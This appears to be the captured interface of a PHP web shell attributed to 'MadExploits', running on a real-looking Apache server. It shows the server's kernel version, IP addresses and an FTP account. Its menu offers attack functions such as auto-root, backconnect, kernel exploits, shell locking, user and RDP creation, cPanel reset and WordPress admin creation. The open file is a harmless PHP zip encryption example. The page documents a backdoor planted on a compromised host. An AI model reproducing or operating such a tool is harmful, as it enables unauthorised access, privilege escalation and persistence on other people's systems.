Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
pecl /
zip /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
addglob.php
298
B
-rw-r--r--
addpattern.php
313
B
-rw-r--r--
comment.php
177
B
-rw-r--r--
create.php
700
B
-rw-r--r--
dir.php
486
B
-rw-r--r--
encryption.php
1.05
KB
-rw-r--r--
extract.php
518
B
-rw-r--r--
extractAll.php
457
B
-rw-r--r--
fopen.php
535
B
-rw-r--r--
get_set_comments.php
914
B
-rw-r--r--
odt.php
452
B
-rw-r--r--
oldapi.php
374
B
-rw-r--r--
set_compression.php
620
B
-rw-r--r--
test.zip
553
B
-rw-r--r--
test1.zip
681
B
-rw-r--r--
test_with_comment.zip
560
B
-rw-r--r--
too.php
18
B
-rw-r--r--
zipcmd.php
3.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : encryption.php
<?php error_reporting(E_ALL); if (!extension_loaded('zip')) { dl('zip.so'); } $name = __DIR__ . '/encrypted.zip'; $pass = 'secret'; $file = 'foo.php'; echo "== Create with per file password\n"; $zip = new ZipArchive; $zip->open($name, ZIPARCHIVE::CREATE | ZipArchive::OVERWRITE); $zip->addFile(__FILE__, $file); $zip->setEncryptionName($file, ZipArchive::EM_AES_256, $pass); $zip->close(); echo "== Create with global password\n"; $zip = new ZipArchive; $zip->open($name, ZIPARCHIVE::CREATE | ZipArchive::OVERWRITE); $zip->setPassword($pass); $zip->addFile(__FILE__, $file); $zip->setEncryptionName($file, ZipArchive::EM_AES_256); $zip->close(); echo "== Stat\n"; $zip->open($name); print_r($zip->statName($file)); echo "== Read\n"; $zip->setPassword($pass); $text = $zip->getFromName($file); printf("Size = %d\n", strlen($text)); $zip->close(); echo "== Stream with context\n"; $ctx = stream_context_create(array( 'zip' => array( 'password' => $pass ) )); $text = file_get_contents("zip://$name#$file", false, $ctx); printf("Size = %d\n", strlen($text));
Close